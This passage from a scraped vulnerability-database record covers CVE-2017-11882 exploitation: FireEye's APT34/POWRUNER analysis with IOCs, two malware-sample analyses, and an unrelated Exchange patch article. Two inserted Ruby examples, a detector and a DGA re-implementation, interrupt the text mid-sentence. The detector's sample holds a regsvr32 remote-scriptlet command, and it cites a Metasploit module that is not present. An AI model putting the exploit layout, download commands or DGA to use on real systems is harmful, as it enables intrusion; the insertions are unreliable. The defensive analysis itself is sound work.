As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.\n\n#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability\n\nCVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote attacker to run arbitrary code in the context of the current user as a result of improper handling of objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.\n\nThe vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It runs as a separate process rather than as a child process of the Office application. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. Because EQNEDT32.EXE was built with an older compiler and does not support address space layout randomization (ASLR), a mitigation that hinders exploitation of memory corruption vulnerabilities, the attacker can reliably redirect the flow of program execution.\n\n#### Analysis\n\nAPT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882: the oversized data overflows a buffer on the stack, and the overflow overwrites the saved return address with the address of an existing instruction in EQNEDT32.EXE. 
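The Ruby script below is an added triage example; it is not code from the Metasploit module reproduced above or from FireEye's analysis. It hex-decodes each Equation.3 \objdata blob in an RTF, finds the MTEF FONT record and measures the NUL-terminated font name the way the vulnerable copy loop consumes it. A name longer than any plausible typeface name is flagged; the 4-byte value 44 bytes into the name is reported as the candidate return address (the module above starts the name at offset 0x26 and appends 0x00402114 at 0x52, so that offset is taken from its payload layout), together with the first printable command string after it. The 36-byte threshold is an assumption, and the RTF samples and the regsvr32 command line in them are constructed for the example.

```ruby
# Added example: triage of Equation.3 objects in RTF for CVE-2017-11882-style
# font-name overflows. Not the Metasploit module's code; the offsets mirror the
# payload that module builds, the threshold is an assumption.
MTEF_HDR      = "\x03\x01\x01\x03\x0a".b  # MTEF v3 header bytes as the module lays them out
FONT_TAG      = "\x08".b                  # FONT record: tag, typeface, style, NUL-terminated name
MAX_FONT_NAME = 36                        # ASSUMPTION: no legitimate typeface name is longer
RET_OFFSET    = 44                        # module: name starts at 0x26, address appended at 0x52

# Return every hex-decoded \objdata blob that belongs to an Equation.3 object.
def extract_equation_blobs(rtf)
  rtf.scan(/\\objclass\s+Equation\.3\}.*?\\objdata\s*([0-9a-fA-F\s]+)\}/m).map do |(hex)|
    [hex.delete('^0-9a-fA-F')].pack('H*')
  end
end

# Measure the font name as the vulnerable copy loop does: byte by byte up to the first NUL.
def triage_equation_blob(blob)
  hdr = blob.index(MTEF_HDR)
  return { verdict: :no_mtef } unless hdr
  tag = blob.index(FONT_TAG, hdr + MTEF_HDR.bytesize)
  return { verdict: :no_font_record } unless tag
  name_start = tag + 3                                   # skip tag, typeface, style
  nul        = blob.index("\x00".b, name_start) || blob.bytesize
  name_len   = nul - name_start
  return { verdict: :benign, font_name_len: name_len } if name_len <= MAX_FONT_NAME

  ret_at = name_start + RET_OFFSET
  ret    = blob.byteslice(ret_at, 4)
  tail   = blob.byteslice(ret_at + 4, blob.bytesize) || ''.b
  {
    verdict:       :suspicious,
    font_name_len: name_len,
    ret_addr:      ret && ret.bytesize == 4 ? ret.unpack1('V') : nil,
    command:       tail.scan(/[\x20-\x7e]{8,}/n).first  # first printable run after the address
  }
end

def triage_rtf(rtf)
  extract_equation_blobs(rtf).map { |blob| triage_equation_blob(blob) }
end

# --- constructed samples (not real documents) --------------------------------
def wrap_rtf(objdata)
  "{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}\\objw380\\objh260" \
    "{\\*\\objdata #{objdata.unpack1('H*')}\n}}}"
end

# 28 bytes standing in for the OLE equation file header, then the MTEF header and FONT record.
def equation_prefix
  "\x1c\x00\x00\x00\x02\x00".b + ("\x00".b * 22) + MTEF_HDR + "\x0a\x01".b + FONT_TAG + "\x5a\x5a".b
end

def benign_equation
  equation_prefix + "Times New Roman\x00".b
end

def exploit_like_equation
  equation_prefix +
    ("\x90".b * RET_OFFSET) +               # stand-in for the 44 bytes of stager before the address
    [0x00402114].pack('V') + "\x00\x00".b + # the address and padding the module appends
    "regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll\x00".b
end

if $PROGRAM_NAME == __FILE__
  p triage_rtf(wrap_rtf(benign_equation))
  p triage_rtf(wrap_rtf(exploit_like_equation))
end
```

Run it on a real sample with `triage_rtf(File.binread('doc.rtf'))`; anything that comes back `:suspicious` deserves a look at the reported command string, which in the module's case is the regsvr32 scriptlet loader.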
The instruction at that address (displayed in Figure 1, at 00430c12) calls the \u201cWinExec\u201d function from kernel32.dll.\n\n \nFigure 1: Disassembly of overwritten function address\n\nAfter exploitation, the \u2018WinExec\u2019 function is called to create a child process, \u201cmshta.exe\u201d, in the context of the currently logged-on user. The process \u201cmshta.exe\u201d downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.\n\n \nFigure 2: Attacker data copied to corrupt stack buffer\n\n#### Execution Workflow\n\nThe malicious script goes through a series of steps to execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.\n\n \nFigure 3: CVE-2017-11882 and POWRUNER attack sequence\n\n 1. The malicious .rtf file exploits CVE-2017-11882.\n 2. The overflow overwrites the saved return address with the address of an existing instruction in EQNEDT32.EXE.\n 3. The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt.\n 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.\n 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\\n 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.\n 7. 
cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.\n 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.\n 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.\n\nFigure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.\n\n \nFigure 4: Execution Workflow Section of v.vbs\n\nAfter successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. \n\n#### hUpdateCheckers.ps1 (POWRUNER)\n\nThe backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.\n\n \nFigure 5: POWRUNER PowerShell script hUpdateCheckers.ps1\n\nPOWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either \u201cnot_now\u201d or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. 
The command values and the associated actions are described in Table 1.\n\nCommand | Description | Action\n---|---|---\n0 | Server response string contains batch commands | Execute the batch commands and send the results back to the server\n1 | Server response string is a file path | Check for the file path and upload (PUT) the file to the server\n2 | Server response string is a file path | Check for the file path and download (GET) the file\n\nTable 1: POWRUNER commands\n\nAfter successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.\n\nThe C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server.\n\n \nFigure 6: PowerShell Screenshot Functionality\n\n#### dUpdateCheckers.ps1 (BONDUPDATER)\n\nOne of the recent advancements by APT34 is the use of a DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA to generate subdomains for communication with the C2 server.\n\n#### DGA Implementation\n\nFigure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER\u2019s custom DGA.\n\n \nFigure 7: Breakdown of subdomain created by BONDUPDATER\n\n 1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));\n 2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.\n 3. Initially set to 000, then incremented by 3 after every DNS request.\n 4. 
First 12 characters of the system UUID.\n 5. \u201cB007\u201d hardcoded string.\n 6. Hardcoded domain \u201cmumbai-m[.]site\u201d\n\nBONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:\n\n 1. Create a temporary file in the %temp% location\n * The file created will have the last two octets of the resolved IP address as its filename.\n 2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.\n\nCharacter | Description\n---|---\n0 | File contains batch commands; execute them\n1 | Rename the temporary file with a .ps1 extension\n2 | Rename the temporary file with a .vbs extension\n\nTable 2: BONDUPDATER actions\n\nFigure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation.\n\n \nFigure 8: Domain Generation Algorithm\n\nSome examples of the generated subdomains observed at time of execution include:\n\n143610035BAF04425847B007.mumbai-m[.]site\n\n835710065BAF04425847B007.mumbai-m[.]site\n\n376110095BAF04425847B007.mumbai-m[.]site\n\n#### Network Communication\n\nFigure 9 shows example network communications between a POWRUNER backdoor client and server.\n\n \nFigure 9: Example Network Communication\n\nIn the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. 
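The following Ruby is an added example, not APT34's script or FireEye's code: it re-implements the BONDUPDATER subdomain layout from the six-part breakdown above (random two-digit groups, the 0/1 flag, a counter advancing by 3, twelve UUID characters, the B007 tag, the hard-coded domain) and, more usefully for a defender, inverts it into a matcher that decomposes observed labels and scans DNS log lines. The flag is passed in rather than derived from a 24.125.x.x resolution, dashes are assumed to be stripped from the UUID before the first 12 characters are taken (the page's example contains none), and the log format and client addresses are constructed; the two hostnames in the sample log are the ones FireEye reports.

```ruby
# Added example: BONDUPDATER's subdomain layout as FireEye describes it, plus a
# DNS-log matcher. Not APT34's script or FireEye's code.
BOND_TAG    = 'B007'
BOND_DOMAIN = 'mumbai-m.site'   # written defanged on the page as mumbai-m[.]site

# Component 1: one to six two-digit numbers joined, mirroring the Get-Random expression on the page.
def bond_random_prefix(rng)
  Array.new(rng.rand(1..6)) { rng.rand(10..99) }.join
end

# Components 1-5 concatenated. ASSUMPTION: dashes are stripped before the first 12
# UUID characters are taken, since the page's example (6B0C8B2CE9C9) contains none.
def bond_label(rnd, flag, counter, uuid)
  format('%s%d%03d%s%s', rnd, flag, counter, uuid.delete('-')[0, 12].upcase, BOND_TAG)
end

# The first n lookups a client would issue: counter starts at 000 and advances by 3 per request.
# The flag is a parameter here; the real script flips it on a 24.125.x.x resolution.
def bond_sequence(uuid, n, flag: 0, rng: Random.new(1))
  Array.new(n) { |i| "#{bond_label(bond_random_prefix(rng), flag, i * 3, uuid)}.#{BOND_DOMAIN}" }
end

# Inverse: the UUID slice and tag are fixed width, so the split of a label is unambiguous.
BOND_LABEL_RE = /\A((?:\d{2}){1,6})([01])(\d{3})([0-9A-F]{12})B007\z/

def decompose_bond_label(label)
  m = BOND_LABEL_RE.match(label)
  return nil unless m
  { rnd: m[1], flag: m[2].to_i, counter: m[3].to_i, uuid12: m[4] }
end

# Scan "timestamp client qname" lines (a constructed log format) and return the hits
# with the decomposed DGA fields attached.
def scan_dns_log(lines)
  lines.map do |line|
    ts, client, qname = line.split
    next unless qname
    label, *rest = qname.split('.')
    parts = decompose_bond_label(label)
    parts && parts.merge(ts: ts, client: client, domain: rest.join('.'))
  end.compact
end

# Constructed sample log; the two DGA qnames are the ones FireEye reports, the rest is made up.
SAMPLE_DNS_LOG = [
  '2017-11-20T10:00:01Z 10.0.0.15 456341921300006B0C8B2CE9C9B007.mumbai-m.site',
  '2017-11-20T10:00:02Z 10.0.0.15 www.example.invalid',
  '2017-11-20T10:01:01Z 10.0.0.15 143610035BAF04425847B007.mumbai-m.site',
].freeze

if $PROGRAM_NAME == __FILE__
  puts bond_sequence('6b0c8b2c-e9c9-4a7b-9d1e-000000000000', 3)
  p scan_dns_log(SAMPLE_DNS_LOG)
end
```

Matching on the label alone, rather than on mumbai-m[.]site, is deliberate: the counter and UUID fields survive a change of apex domain, while the domain is the part of the indicator the operator can swap most cheaply.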
The C2 server sends back a Base64-encoded response.\n\nIf the server had sent the string \u201cnot_now\u201d as the response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.\n\nFigure 10: Example \"not now\" server response\n\n#### Batch Commands\n\nPOWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged-in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.\n\nFigure 11: Batch commands sent by POWRUNER C2 server\n\n#### Additional Use of POWRUNER / BONDUPDATER\n\nAPT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8) that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:\n\nhxxp://94.23.172.164/dupdatechecker.doc\n\nAs shown in Figure 12, the script within the dupdatechecker.doc file attempts to download another file named dupdatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be a taunt aimed at security researchers.\n\nFigure 12: Contents of dupdatechecker.doc script\n\nThe dupdatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.\n\n#### Outlook and Implications\n\nRecent activity by APT34 demonstrates that they are a capable group with potential access to their own development resources. 
During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly known vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East. We assess that APT34\u2019s efforts to continuously update their malware, including the incorporation of a DGA for C2, demonstrate the group\u2019s commitment to pursuing strategies to evade detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.\n\n#### IOCs\n\n| **Filename / Domain / IP Address** | **MD5 Hash or Description** |\n|---|---|\n| CVE-2017-11882 exploit document | A0E6933F4E0497269620F44A083B2ED4 |\n| b.txt | 9267D057C065EA7448ACA1511C6F29C7 |\n| v.txt/v.vbs | B2D13A336A3EB7BD27612BE7D4E334DF |\n| dUpdateCheckers.base | 4A7290A279E6F2329EDD0615178A11FF |\n| hUpdateCheckers.base | 841CE6475F271F86D0B5188E4F8BC6DB |\n| cUpdateCheckers.bat | 52CA9A7424B3CC34099AD218623A0979 |\n| dUpdateCheckers.ps1 | BBDE33F5709CB1452AB941C08ACC775E |\n| hUpdateCheckers.ps1 | 247B2A9FCBA6E9EC29ED818948939702 |\n| GoogleUpdateschecker.vbs | C87B0B711F60132235D7440ADD0360B0 |\n| hxxp://mumbai-m[.]site | POWRUNER C2 |\n| hxxp://dns-update[.]club | Malware Staging Server |\n| CVE-2017-0199 exploit document | 63D66D99E46FB93676A4F475A65566D8 |\n| 94.23.172.164:80 | Malware Staging Server |\n| dupdatechecker.doc | D85818E82A6E64CA185EDFDDBA2D1B76 |\n| dupdatechecker.exe | C9F16F0BE8C77F0170B9B6CE876ED7FB |\n| proxycheker[.]pro | C2 |\n| 46.105.221.247 | Has resolved mumbai-m[.]site & hpserver[.]online |\n| 148.251.55.110 | Has resolved mumbai-m[.]site and dns-update[.]club |\n| 185.15.247.147 | Has resolved dns-update[.]club |\n| 145.239.33.100 | Has resolved dns-update[.]club |\n| 82.102.14.219 | Has resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com |\n| v7-hpserver.online.hta | E6AC6F18256C4DDE5BF06A9191562F82 |\n| dUpdateCheckers.base | 3C63BFF9EC0A340E0727E5683466F435 |\n| hUpdateCheckers.base | EEB0FF0D8841C2EBE643FE328B6D9EF5 |\n| cUpdateCheckers.bat | FB464C365B94B03826E67EABE4BF9165 |\n| dUpdateCheckers.ps1 | 635ED85BFCAAB7208A8B5C730D3D0A8C |\n| hUpdateCheckers.ps1 | 13B338C47C52DE3ED0B68E1CB7876AD2 |\n| googleupdateschecker.vbs | DBFEA6154D4F9D7209C1875B2D5D70D5 |\n| hpserver[.]online | C2 |\n| v7-anyportals.hta | EAF3448808481FB1FDBB675BC5EA24DE |\n| dUpdateCheckers.base | 42449DD79EA7D2B5B6482B6F0D493498 |\n| hUpdateCheckers.base | A3FCB4D23C3153DD42AC124B112F1BAE |\n| dUpdateCheckers.ps1 | EE1C482C41738AAA5964730DCBAB5DFF |\n| hUpdateCheckers.ps1 | E516C3A3247AF2F2323291A670086A8F |\n| anyportals[.]com | C2 |\n", "modified": "2017-12-07T12:00:00", "published": "2017-12-07T12:00:00", "id": "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "href": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "type": "fireeye", "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2018-12-25T17:29:45", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "![](/Article/UploadPic/2018-12/20181225205545726.png) \nWe recently intercepted an attack sample delivered as a Word document with a .doc extension whose format is actually RTF. Analysis of the document\u2019s structure shows that it exploits the CVE-2017-11882 and CVE-2018-0802 vulnerabilities, using an embedded Excel object to trigger them. The dropped PE file is used to collect sensitive information from the target user. 
\n\nI. Basic situation \nIn the test environment (Windows 7 x64, Office 2010), opening the document while monitoring processes shows that after the winword process starts, it first executes excel.exe, then runs EQNEDT32.exe, then runs cmd.exe, and finally runs the A.X process; EQNEDT32.exe runs twice. Seeing EQNEDT32.exe, our first impression is that this should be a CVE-2017-11882 or CVE-2018-0802 sample. \nWhen opened, the document displays as empty, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545737.png) \nAt a glance it looks blank, but a closer look reveals a small black dot icon in the top-left corner, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545312.png) \nDouble-clicking it brings up a dialog, shown below, reading \u201cWindows cannot open this file: A.X\u201d. The \u201csmall black dot\u201d is evidently an external object. \n![](/Article/UploadPic/2018-12/20181225205545780.png) \nRight-clicking the object and selecting the \u201cPackager Shell Object\u201d entry lets us view the object\u2019s \u201cProperties\u201d, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545220.png) \nThe object properties are shown below: \n![](/Article/UploadPic/2018-12/20181225205545229.png) \nAt this point we can conclude that the sample embeds a PE object in the RTF, which is dropped to the %temp% directory by default when the document is opened, and then uses CVE-2017-11882 or CVE-2018-0802 to execute it. \n\nII. RTF analysis \n1. Document structure analysis \n![](/Article/UploadPic/2018-12/20181225205545186.png) \nAnalyzing the document with rtfobj finds two embedded objects: a Package object and an Excel.Sheet.8 object, as shown in the figure. The Package object\u2019s original file path is \u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201d. From this we can see that the document author\u2019s [operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>) user name is n3o. \nA.X is the dropped malicious PE file. \nThe other object is an embedded Excel sheet. After extracting it, renaming its extension to .xls and opening it in Excel, we find that it contains two objects, AAAA and bbbb, both of which are \u201cEquation.3\u201d objects, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545928.png) \nThe structure of the extracted Excel sheet object is shown below. \n![](/Article/UploadPic/2018-12/20181225205545742.png) \nThe sheet contains two Microsoft Equation 3.0 objects, MBD0002E630 and MBD0002E631, with CLSID \u201c0002ce02-0000-0000-c000-000000000046\u201d; their modification time is 2018/5/21 17:52. \n![](/Article/UploadPic/2018-12/20181225205545793.png) \nIn addition, the Ole10Native streams of the two \u201cMicrosoft Equation 3.0\u201d objects are 59 bytes and 160 bytes in size and contain \u201ccmd.exe /c %tmp%\\A.X\u201d, which is used to launch the A.X process. The two objects are presumably used in combination to exploit the CVE-2017-11882 and CVE-2018-0802 vulnerabilities. \nWith this, the basic behaviour of the sample is clear; the overall flow is shown in the following diagram. \n![](/Article/UploadPic/2018-12/20181225205545654.png) \n2. Static document analysis \nOpening the file in WinHex, the first Package object can be found at file offset 0x2A8A. The value 0x00137158 is the size of the object, 1274200 in decimal, which is the size of the dropped A.X. Following it is the PE file. In WinHex we can see that the author modified the PE header 0x4D5A by inserting 0x090d between the characters, so that it reads [0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d] while still decoding to 0x4d5a. This is presumably done to evade certain anti-virus detection, so that the bytes 0x4d5a9000 do not appear directly and the object is not immediately recognizable as a PE file. Details are shown below: \n![](/Article/UploadPic/2018-12/20181225205545840.png) \nThe other object, at offset 0x299061, is an Excel.Sheet.8 object. Its size is 0x00005C00, 23552 in decimal, consistent with the size of the Excel file extracted by rtfobj. The author also altered the compound document header by inserting 0x0909, so that the d0cf11 at the start of the compound document becomes d[0x0909]0[0x0909]... This is presumably also a form of [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>).\n", "edition": 1, "modified": "2018-12-25T00:00:00", "published": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-02T18:49:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "We recently collected a Word document with a .doc extension that on inspection is actually a Rich Text Format document. Opening it in a test environment revealed network connections and program execution, so we determined that the sample is a malicious document. Preliminary analysis found that it is a new sample exploiting the CVE-2017-11882 vulnerability. 
CVE-2017-11882 and CVE-2018-0802 are both rooted in the processing logic of the Office Equation Editor and have recently become a conventional means of malicious Office document attacks. Analyses of the vulnerability\u2019s origin and exploitation are already available online, such as 360 Skyeye Lab\u2019s technical analysis of the latest CVE-2017-11882 [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>) technique that abuses the Equation Editor\u2019s special processing logic, and Tencent PC Manager\u2019s analysis of a sample that combines the NDAY vulnerability CVE-2017-11882 with the 0Day vulnerability CVE-2018-0802 to spread remote-control Trojans. This sample differs slightly from those analyzed before and appears to be a variant of the CVE-2017-11882 exploit. \nI. Basic behaviour \nTest environment: Windows 7 x64 SP1 (Chinese edition), Office 2010 (Chinese edition). \nAfter the exploit sample is opened, the displayed document content is garbled, as shown below. \n![](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png!small) \nIn addition, an executable named emre.exe is created in the %temp% directory and run. Packet capture shows that emre.exe is downloaded from hxxp://ghthf[.]cf/cert/ochicha.exe, as shown below. \n![](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png!small) \nII. Debugging the vulnerability \n1. Sample layout \nOpened in WinHex, the file looks like the following two figures. The displayed content follows directly after the document header. \n![](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png!small) \nThat is followed by the object, as shown below. \n![](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png!small) \n2. Preliminary RTF analysis \nThe result of analyzing the file with rtfobj is shown below. The CLSID is 0002ce02-0000-0000-c000-000000000046, i.e. a Microsoft Equation Editor object. \n![](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png!small) \n![](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png!small) \nFrom the figure we can see that the object is named \u201ceQuatiON native\u201d; the normal object name \u201cEquation Native\u201d has had its case altered, probably also in pursuit of [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>). \n3. Debugging the vulnerability \nBased on the published vulnerability analysis reports, we go straight to debugging the vulnerable function at 0041160F. \n![](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png!small) \nAfter the 11th iteration of the rep instruction, as shown in the following figure, the stack is overwritten with 0x0043F775. \n![](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png!small) \n![](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png!small) \nIn the EQNEDT32.EXE process, the byte at 0x0043F775 is C3, which happens to be the retn instruction. \n![](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png!small) \nAfter it executes, control jumps to the shellcode, as shown below: \n![](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png!small) \n4. Shellcode debugging and analysis \nThe shellcode is located in the eQuatiON native object. \nIt is divided into two parts. The first starts at offset 0x0826 (the bytes B9 C439E66A, shown in the figure as the disassembly starting at 0018F354) and runs to 0x0851, followed by the four bytes 0x0043F7F5 (the address of the RETN instruction in the EQNEDT32.EXE process). The second part runs from 0x089E to the end. \n![](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png!small) \nThe assembly instructions by which the first part of the shellcode jumps to the second part are shown below: \n![](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png!small) \nAnalysis shows that this segment of shellcode performs a series of jmp instructions, the result of shellcode obfuscation and protection. For example, as the following figure shows: \n![](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png!small)\n", "edition": 1, "modified": "2018-12-02T00:00:00", "published": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:00:20", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. 
Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. 
Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA), giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and, using Outside In, processes the message on Exchange, exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off a visualization mode that renders documents are not affected; documents such as PDFs instead would be processed by a reader such as Adobe or Foxit, avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for the faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. 
